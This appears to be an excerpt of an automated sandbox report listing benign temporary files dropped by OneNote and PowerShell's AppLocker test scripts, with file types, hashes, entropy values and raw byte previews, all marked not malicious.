Encrypted:	false
SSDEEP:	3::
MD5:	2C7AB85A893283E98C931E9511ADD182
SHA1:	3B4417FC421CEE30A9AD0FD9319220A8DAE32DA2
SHA-256:	080ACF35A507AC9849CFCBA47DC2AD83E01B75663A516279C8B9D243B719643E
SHA-512:	7E208B53E5C541B23906EF8ED8F5E12E4F1B470FBD0D3E907B1FC0C0B8D78EB1BBFB5A77DCFD9535ACF6FA47F4AB956D188B770352C13B0AB7E0160690BAE896
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhdxr3lf.vim.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ct3sixwc.sxo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jipc3bjv.yiq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rr320nq5.40m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\{022223DD-4393-4800-9B44-EFAE9FCA242C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	GIF image data, version 89a, 1012 x 327
Category:	dropped
Size (bytes):	11765
Entropy (8bit):	7.911655818336033
Encrypted:	false
SSDEEP:	192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
MD5:	B035F23C68CC9673E604FE5472F223D2
SHA1:	56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
SHA-256:	F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
SHA-512:	B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
Malicious:	false
Preview:	GIF89a..G.................................................................................................................................................................\|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..\|..~.................................................................................................................................................!.......,......G........H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

C:\Users\user\AppData\Local\Temp\{060BF765-B4B1-4F0B-9D62-FEE33E9126CB}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 85 x 470, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11197
Entropy (8bit):	7.975073010774664
Encrypted:	false
SSDEEP:	192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
MD5:	DDC3CC30794277500EFE4BC6667EC123
SHA1:	EFC9642C1F95B5FC38764476AE481649C016FA0C
SHA-256:	7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
SHA-512:	25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
Malicious:	false
Preview:	.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............\|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&\|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

C:\Users\user\AppData\Local\Temp\{073EE088-BE25-4FDC-AB41-8868AC1183B5}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	2.941351060644542
Encrypted:	false
SSDEEP:	384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
MD5:	ACF4A9F470281F475EA45E113E9FB009
SHA1:	B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
SHA-256:	5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
SHA-512:	998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
Malicious:	false
Preview:	....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..\|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

C:\Users\user\AppData\Local\Temp\{0CD75E05-A671-4465-9AF9-A436BE94C381}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{0F72757B-DF80-430E-AA36-048F27864243}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
Category:	dropped
Size (bytes):	3009
Entropy (8bit):	7.493528353751471
Encrypted:	false
SSDEEP:	48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
MD5:	D9BD80D40B458EDB2A318F639561579A
SHA1:	83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
SHA-256:	509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
SHA-512:	C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''*''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .te..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N..............#..M<\|.2.Y.../QO.x.cTM4......+.F;V.x.de....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........\|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

C:\Users\user\AppData\Local\Temp\{12E09907-A1C1-4548-A5C7-C3975664C4F1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
Category:	dropped
Size (bytes):	84097
Entropy (8bit):	7.78862495530604
Encrypted:	false
SSDEEP:	1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
MD5:	37EED97290E8ECB46A576C84F0810568
SHA1:	18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
SHA-256:	140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
SHA-512:	E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
Malicious:	false
Preview:	......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

C:\Users\user\AppData\Local\Temp\{147AC1E2-9435-4FD7-875C-C3438F50376D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	86187
Entropy (8bit):	7.951356272886186
Encrypted:	false
SSDEEP:	1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
MD5:	FEE4785DF76E93A9DC2F4501CBAEAE12
SHA1:	8FB4527BDE05EF208FCDB168098A07707C27501F
SHA-256:	F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
SHA-512:	7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....\|.,lZKCEB.t...fw\|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..WH<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

C:\Users\user\AppData\Local\Temp\{14915C67-FA42-4C7F-90BF-986EC4B23022}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6437328624671793
Encrypted:	false
SSDEEP:	12:RaiHNSYyf9/UfzotuFFBtwXaMtag2Wf/CIagq:YFYyfSbZtwXaMtaFca9
MD5:	3FB4AB284657BFBD6081DE175954B443
SHA1:	A7C5295E6A6C980716F60913402A1DEDFC661858
SHA-256:	C6B8E1F48834419AA821DD1282A5A29577AA0CE3C1BB47CA88264F8A725C45CB
SHA-512:	40540BE6F0C01EC10D8F2FDB7397874CDD91FEB8114CDE269159D8D44DCD293DF15D126508BA8D2B2A49CB52104C4D8C177847BC1706F43CA114F53152DE597F
Malicious:	false
Preview:	./.C..vL....W"v_..z..F..w...\|.................?.....I...............................................................................................................h............................................HP^,..H....b.}...........t..0C.-...p..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{1637B3B5-F033-4BD0-812B-E7CD46BC61AF}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Temp\{1F0C731B-B953-4CF4-985D-D0CBDA3B8B6F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 623, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	7.583832946136897
Encrypted:	false
SSDEEP:	24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
MD5:	07DB3F43DE7C1392C67802E74707DAA6
SHA1:	C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
SHA-256:	51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
SHA-512:	E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
Malicious:	false
Preview:	.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..\|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2\|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.\|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

C:\Users\user\AppData\Local\Temp\{241167F7-1A2E-4DC2-AFA6-BB8DAACE9952}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 176 x 513, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11043
Entropy (8bit):	7.96811228801767
Encrypted:	false
SSDEEP:	192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
MD5:	8E9AB9C28B155A66BC5C0DA5E2A4EFB5
SHA1:	972E61F162D48F1CEE21963ECBB2FE439105DB55
SHA-256:	B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
SHA-512:	12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
Malicious:	false
Preview:	.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.\|.L.\|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s\|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.\|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....\|.)

C:\Users\user\AppData\Local\Temp\{271561D9-4F71-40C0-A94E-FD91C5533589}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	7.384274251000273
Encrypted:	false
SSDEEP:	48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
MD5:	09A7AE94AA8E517298A9618A13D6E0E2
SHA1:	FA5181A7414BA32F816BF0C4278EC20C615E8B1A
SHA-256:	3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
SHA-512:	074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.\|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.\|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)..TT...."....T.Tc.j..............j.z!.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._.._C.k..p9.p..O..vu...'........0v

C:\Users\user\AppData\Local\Temp\{272572A7-7936-408D-BAFC-2A335FF21DD2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
Category:	dropped
Size (bytes):	1717
Entropy (8bit):	7.154087739587035
Encrypted:	false
SSDEEP:	48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
MD5:	943371B39CA847674998535110462220
SHA1:	5CA79B7BD7E0E93271463FAEF3280F1644CBA073
SHA-256:	9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
SHA-512:	812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J....Q...b.Q..Ah....Ah..b.Ah..b.PZ.(.@z.?.`;2.......................................................Q...b.Q..EZ.(..Z>.G.....`Z+E......J....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

C:\Users\user\AppData\Local\Temp\{2CE6039A-1ACC-49FD-B0B5-3B83455FFD97}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6474131890413168
Encrypted:	false
SSDEEP:	6:Ra0GtjYyfB3h1RRXUnfy+bgjEfFFBl/FKHpYGrRujlw//0lweI/qTGxRujd:RahYyf9/Ufy2WaFFBt0YXWf/qTb
MD5:	10F089E2D784CF82FAFDA0607203763E
SHA1:	FB7235000C7F4F110D811CCF3F0116766DD421CE
SHA-256:	99EE19239A6CDE0A087295DD36518239011DFCD698BB9302C0FD64F87DCAE189
SHA-512:	30730DF6B6DC0AC752053D4D2E89459B9105AB98D5B0B59B60C93CBDB735CE487E7CF2F1184E30C77871C7C5FEA2FAD07DEFE6AC1F9C25DDC246282614B7D360
Malicious:	false
Preview:	./.C..vL....W"v_a....PqC.-i....................?.....I...............................................................................................................h.............................................Z.?lSM.h!XG.O..........\|b...O.}F.V.F.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{2EF04399-750A-4BB4-9C59-F8C94460230F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
Category:	dropped
Size (bytes):	3428
Entropy (8bit):	7.766473352510893
Encrypted:	false
SSDEEP:	96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
MD5:	EE9E2DF458733B61333E8A82F7A2613D
SHA1:	A86704C969F51B86D6A05ED51C6C60214ED9FA89
SHA-256:	BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
SHA-512:	BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
Malicious:	false
